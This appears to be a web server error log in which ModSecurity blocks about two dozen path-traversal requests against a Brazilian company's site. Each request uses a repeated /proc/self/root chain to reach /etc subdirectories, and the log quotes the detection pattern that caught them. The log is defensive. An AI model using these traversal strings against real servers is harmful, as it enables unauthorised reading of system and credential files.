[Mon Mar 16 18:01:20.726894 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:36632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvoKTCbgAP5jq5TehHbQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:01:21.861916 2026] [:error] [pid 21806:tid 140411540502272] [client 74.7.243.203:36648] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvodSswJuvopo3lOh7UwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:01:23.155131 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:36660] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvo_9ocpUE4ed4uDwPDQAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:24.333611 2026] [:error] [pid 21805:tid 140411649607424] [client 74.7.243.203:36668] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvpLABkC4fWIHEf8ER_AAAAEs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:01:25.620775 2026] [:error] [pid 10831:tid 140411548894976] [client 74.7.243.203:36678] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvpY6lpbStxTqkSkuEugAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:26.826409 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.243.203:36686] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvprysWC90G-1nBrBgFQAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:01:27.999001 2026] [:error] [pid 29802:tid 140411733534464] [client 74.7.243.203:36690] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvp8_BxrYCr4hPDw8F9QAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:29.179263 2026] [:error] [pid 29802:tid 140411699963648] [client 74.7.243.203:36702] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvqc_BxrYCr4hPDw8F9gAAAcU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:30.514079 2026] [:error] [pid 15061:tid 140411674785536] [client 74.7.243.203:59542] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvqqTCbgAP5jq5TehHbwAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:31.728636 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:59554] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvq6TCbgAP5jq5TehHcAAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:33.057593 2026] [:error] [pid 21805:tid 140411674785536] [client 74.7.243.203:59558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvrbABkC4fWIHEf8ESAAAAAEg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:34.230378 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:59568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvrtSswJuvopo3lOh7VAAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:35.576211 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:59574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvr7ysWC90G-1nBrBgFgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:36.759696 2026] [:error] [pid 29802:tid 140411683178240] [client 74.7.243.203:59590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvsM_BxrYCr4hPDw8F9wAAAcc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:38.031603 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.243.203:59598] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvsqQpVkWug9HeOt9PXQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:39.301597 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:59604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvs7ABkC4fWIHEf8ESAQAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:40.457302 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:49596] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvtLABkC4fWIHEf8ESAgAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:42.797805 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.243.203:49600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvtrABkC4fWIHEf8ESBgAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:44.087927 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:49610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvuLABkC4fWIHEf8ESBwAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:45.257072 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.243.203:49620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvuUr9dMAiw-8KANNkNgAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:46.559271 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.243.203:49630] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvutSswJuvopo3lOh7VQAAAIc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:47.715921 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:49632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvu7ysWC90G-1nBrBgFwAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:49.024209 2026] [:error] [pid 15061:tid 140411708356352] [client 74.7.243.203:49646] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvvaTCbgAP5jq5TehHcQAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:50.224402 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.243.203:45394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvvrABkC4fWIHEf8ESCAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
